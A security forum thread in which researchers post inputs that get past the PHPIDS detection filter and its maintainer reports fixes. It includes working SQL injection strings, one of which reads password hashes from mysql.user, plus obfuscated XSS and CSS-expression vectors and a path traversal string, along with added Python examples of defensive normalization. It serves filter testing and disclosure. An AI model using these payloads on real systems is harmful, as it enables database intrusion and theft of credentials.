Sla.ckers.org
;
Posted by: Anonymous User
Date: September 07, 2009 02:50PM

b



Edited 1 time(s). Last edit at 10/16/2009 02:09AM by philip_clarke.

Re: phpids bypass using mootools
Posted by: Anonymous User
Date: September 07, 2009 06:23PM

Confirmed and fixed - will be mentioned in the next release note (if you don't mind). Thanks!

https://trac.php-ids.org/index.fcgi/changeset/1327

Re: PHPIDS (0.6.1 "Thriller")
Posted by: barbarianbob
Date: September 08, 2009 08:50AM

@thrill thanks



Edited 1 time(s). Last edit at 09/08/2009 10:23AM by barbarianbob.

Re: PHPIDS (0.6.1 "Thriller")
Posted by: thrill
Date: September 08, 2009 10:13AM

@phillip

Today I only deleted your posts. I will no longer tolerate your abusive personality. If you continue attempting to insult other members of this board, I will ban you. Consider this your final warning.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: PHPIDS (0.6.1 "Thriller")
Posted by: Anonymous User
Date: September 08, 2009 11:29AM

Am I the only one here feeling the need to grow out of our diapers and behave like grown-ups again?



Edited 1 time(s). Last edit at 09/08/2009 02:19PM by .mario.

f
Posted by: Anonymous User
Date: September 08, 2009 04:54PM

s



Edited 1 time(s). Last edit at 10/16/2009 02:07AM by philip_clarke.

Re: PHPIDS (0.6.1 "Thriller") ... thriller indeed huh?
Posted by: thornmaker
Date: September 11, 2009 01:23PM

I read this morning that mod security will be adding the php-ids filters into the core rule set: https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/2009-September/000091.html

i hope they understand it's php-ids, not php-ips

Re: PHPIDS (0.6.1 "Thriller") ... thriller indeed huh?
Posted by: Anonymous User
Date: September 11, 2009 02:36PM

Yep - I know. The biggest problem is the lack of the Converter. Am currently mailing with Ryan about this.

Re: PHPIDS (0.6.1 "Thriller") ... thriller indeed huh?
Posted by: lightos
Date: September 18, 2009 03:29PM

sql inj' and 0 < ' 1x00 -true
sql inj' and 1 < ' 1x00 -false

Re: PHPIDS 0.6.2 - the release without a name
Posted by: Reiners
Date: October 03, 2009 07:27PM

hi .mario!

I just installed PHPIDS on our internship hacking platform and checked some challenges. PHPIDS doesn't see the following as an attack:

dir/..././..././folder/file.php

In my opinion it should get detected since it's a common attack against a simple "../" filter. On the other hand it's not your job to detect attacks against stupid filters ;) just wanted to let you know.

I'm looking forward to your talk =)

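Why the `..././` string above defeats a single-pass "../" filter, and what a defender should do instead, as an added Python illustration; this is not code from PHPIDS or from anyone in the thread. The `/srv/app/files` base directory and all function names are made up for the example.

```python
import posixpath
from typing import Optional

# The string from the post above.
VECTOR = "dir/..././..././folder/file.php"


def naive_strip(path: str) -> str:
    """The filter class being bypassed: delete '../' in a single pass.

    Removing the inner '../' from '..././' leaves '../' behind, so the
    filter manufactures exactly the traversal it was meant to prevent.
    """
    return path.replace("../", "")


def resolve_within(base: str, user_path: str) -> Optional[str]:
    """Allowlist approach: normalize the joined path and accept it only if
    it still lies under `base`.  Returns None for anything that escapes.

    posixpath is used explicitly so the behaviour is the same on every OS.
    """
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


def is_traversal(user_path: str, base: str = "/srv/app/files") -> bool:
    """Detection view: a request is a traversal if its normalized form
    escapes the document root.  `base` is a made-up directory."""
    return resolve_within(base, user_path) is None


if __name__ == "__main__":
    verdict = lambda p: "traversal" if is_traversal(p) else "harmless"
    print("raw input:        ", VECTOR, "->", verdict(VECTOR))
    after = naive_strip(VECTOR)
    print("after naive strip:", after, "->", verdict(after))
    print("normalized path:  ", resolve_within("/srv/app/files", VECTOR))
```

Two things fall out of running it. Fed straight to a normalizing resolver, the raw string is harmless: `...` is just an oddly named directory, so it stays under the base. It only becomes `dir/../../folder/file.php`, a real traversal, after the single-pass filter has run. A detector that inspects the request before the application's own transformations therefore needs its own signature for the `..././` shape, which is the point Reiners makes.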
Re: PHPIDS 0.6.2 - the release without a name
Posted by: Anonymous User
Date: October 04, 2009 07:42AM

All fixed in .1345 - thx!

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: March 16, 2010 07:33AM

(1)or(1)=(1)

(case-1 when mid(load_file(0x61616161),12, 1/ 1)like 0x61 then 1 else 0 end)
// returns "1" if the 12th character of the file "aaaa" is "a", otherwise "0"

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: lightos
Date: March 18, 2010 02:50AM

http://demo.php-ids.org/?test=-1%27%A0union%A0SELECT@,password%20from%20mysql.user%20where%20true%20rlike%20%271



Edited 1 time(s). Last edit at 03/18/2010 02:52AM by lightos.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: March 18, 2010 06:21AM

nice find!

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: March 18, 2010 07:22AM

Indeed - will be fixed this weekend - thx :)

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Reiners
Date: March 18, 2010 09:41AM

btw %A0 is the only non-standard ASCII character which is allowed as separator. (more here)

here a stupid one if you know the column name in a where clause (independent of data type):

0'+column#

Same as 1' or 1=1# But hard to filter I think.



Edited 2 time(s). Last edit at 03/18/2010 10:48AM by Reiners.

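The %A0 separator is why the union/select URL a few posts up slips past any signature written with an ASCII-only `\s`. The following added Python example (not PHPIDS code and not from anyone in the thread) shows the detection-side fix: fold every byte MySQL's lexer treats as a separator, the C whitespace characters plus 0xA0 as noted in the post above and inline `/**/` comments, to a single space before matching. The sample parameter values are constructed for the example, modeled on the demo URL in the thread.

```python
import re
from urllib.parse import unquote_to_bytes

# A signature written the way many rule sets write it.  In a bytes pattern
# (and in PCRE without the /u modifier) \s covers only ASCII whitespace, so
# a 0xA0 byte between the two keywords is never matched.
NAIVE_SIGNATURE = re.compile(rb"union\s+select", re.IGNORECASE)

# Bytes MySQL accepts between tokens: C whitespace plus 0xA0 (the one
# non-ASCII separator, per the post above).  Inline comments also separate
# tokens, so they are folded as well.
MYSQL_SEPARATORS = re.compile(
    rb"(?:[\x09\x0a\x0b\x0c\x0d\x20\xa0]|/\*.*?\*/)+", re.DOTALL
)


def decode_param(raw: bytes) -> bytes:
    """URL-decode a query-string value to raw bytes (%A0 -> 0xA0)."""
    return unquote_to_bytes(raw)


def normalize_separators(fragment: bytes) -> bytes:
    """Collapse every run of MySQL separators to one ASCII space."""
    return MYSQL_SEPARATORS.sub(b" ", fragment)


def naive_match(raw: bytes) -> bool:
    """Signature applied to the decoded value as-is."""
    return NAIVE_SIGNATURE.search(decode_param(raw)) is not None


def normalized_match(raw: bytes) -> bool:
    """Same signature applied after separator normalization."""
    return NAIVE_SIGNATURE.search(normalize_separators(decode_param(raw))) is not None


if __name__ == "__main__":
    # Constructed sample values; the first mirrors the demo URL's shape.
    samples = [
        b"-1%27%A0union%A0SELECT%20password%20from%20mysql.user",
        b"-1%27/**/union/**/select%201",
        b"-1%27%20union%20select%201",
        b"union%20station",  # benign text that happens to contain a keyword
    ]
    for s in samples:
        print(f"{s!r:60} naive={naive_match(s)!s:5} normalized={normalized_match(s)}")
```

The design point is lexer equivalence: a signature should run over the input as the backend's parser will read it, not as the HTTP layer delivered it. The separator table here is MySQL's; other engines accept different bytes and comment forms, so the normalization has to be written per target dialect.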
Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Gareth Heyes
Date: March 19, 2010 06:28AM

@lightos

Very nice! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 16, 2010 09:24AM

FF & IE

+Harmless HTML is allowed.

<img src="." =">" onerror=alert(1);//

Nothing suspicious was found!

----------------------
~Veritas~

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 16, 2010 11:24AM

Nice! That was a hard one to fix - and I am not sure if it's bulletproof now. The problem was caused by a faulty length comparison between the sanitized and the untreated string resulting in a check against a single character string.

My first solution is a regular expression to check for attribute text flowing out of the tag after the HTMLPurifier treatment and blurring the results. I am sure this fix needs several more iterations to work in 99.99% of all situations but it seems okay for now.

https://trac.php-ids.org/index.fcgi/changeset/1375

Thanks!

[EDIT]Okay - the fix sucks balls - second one coming in



Edited 1 time(s). Last edit at 04/16/2010 11:40AM by .mario.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 16, 2010 12:19PM

Okay - another patch is coming - I had problems with injections like this after the first one:

<img src="." =">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa onerror = alert(1)/&#10;/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

It's still a bit ugly what I did but sufficient for today's evening :)

Thx again...


Btw - it doesn't make people's life easier that crap like this works - but it's useful to know haha:
<img src= # onerror = alert(1) <b>foo</b>



Edited 1 time(s). Last edit at 04/16/2010 12:26PM by .mario.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 17, 2010 04:20PM

All browsers except IE.

alal=(/YWxlcnQ/)(/YWxlcnQ/),
alal=alal[0],
atyujg=(/atob/)(/atob/),
con=atyujg.concat,
con1=con()[0],
con=con1[atyujg],
alal=con(alal),
alal=con1[alal],
alal(1)

<problem>(/blabla/)(/blabla/)</problem>

----------------------
~Veritas~

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 18, 2010 06:35AM

IE only

* Harmless HTML is allowed
* Nothing suspicious was found!

<a style="background:url(http://hh*/)}lo:expression(this.lol?0:alert(this.lol=1))/*%31);">lo</a>

LeverOne

----------------------
~Veritas~

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 06:39AM

Nice one - one more special character and the centrifuge would have got it :) Fixed in .1377!

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 07:56AM

@LeverOne Haha - that vector rocks for so many reasons :) Fixed for now...

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 18, 2010 11:20AM

good :)

more IE
<a style="background:url(/hyyuj)&#125lo:expression&#40alert&#40/1/&#41//)/*lo);">lo</a>

LeverOne

----------------------
~Veritas~

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 02:36PM

Thanks :) I just committed a new version of the internal _diff() method - fixing a lot of other bugs too. It should be way faster since I got rid of a lot of legacy overhead. There were some substantial problems your vectors pointed out and I am relatively sure to have most of them fixed.

I'm ready for the next round :)

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 18, 2010 04:21PM

I'm ready too :)

IE
<a style="background:url(http://lo/\\)}lo:expression\000028alert\000028/1/\000029\000029/*lo);">lo</a>

LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/18/2010 04:26PM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: Anonymous User
Date: April 18, 2010 05:07PM

Nice find! I removed the extra urldecode() - now it makes a bit more sense what's happening in the _diff() method :D Thx!

https://trac.php-ids.org/index.fcgi/changeset/1384

Btw - I am wondering if AmbushCommander is still reading this thread - that vector and most of the ones before are just one tiny step away from breaking the HTMLPurifier:

In: <a style="background:url(//lo/)}lo:expression\(alert(1)));">lo</a>

Out: <a style="background:url(//lo/)%7Dlo:expression\(alert(1)));">lo</a>

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 19, 2010 10:35AM

PHPIDS ( HTMLPurifier )

IE 6

<a href="http://ha.ckers.org/xss.css" style="background:url(/**/javascript:document.documentElement.firstChild.lastChild.href=document.documentElement.firstChild.nextSibling.lastChild.previousSibling.previousSibling.lastChild.previousSibling.previousSibling.lastChild.lastChild.lastChild.lastChild.lastChild.href);">lo</a>

LeverOne

----------------------
~Veritas~



Edited 1 time(s). Last edit at 04/19/2010 10:50AM by LeverOne.

Re: PHPIDS 0.6.3.1 - the release without a name
Posted by: LeverOne
Date: April 19, 2010 03:33PM

All browsers except IE.
alal=(1,/YWxlcnQ/), 
alal=alal(alal),
alal=alal[0],
atyujg=(1,/atob/),
atyujg=atyujg(atyujg),
atat=atyujg[0],
con=atyujg.concat,
con1=con(),
con1=con1[0],
con=con1[atat],
alal=con(alal),
alal=con1[alal],
alal(1)

<problem>alal=(1,/blabla/)</problem>

----------------------
~Veritas~
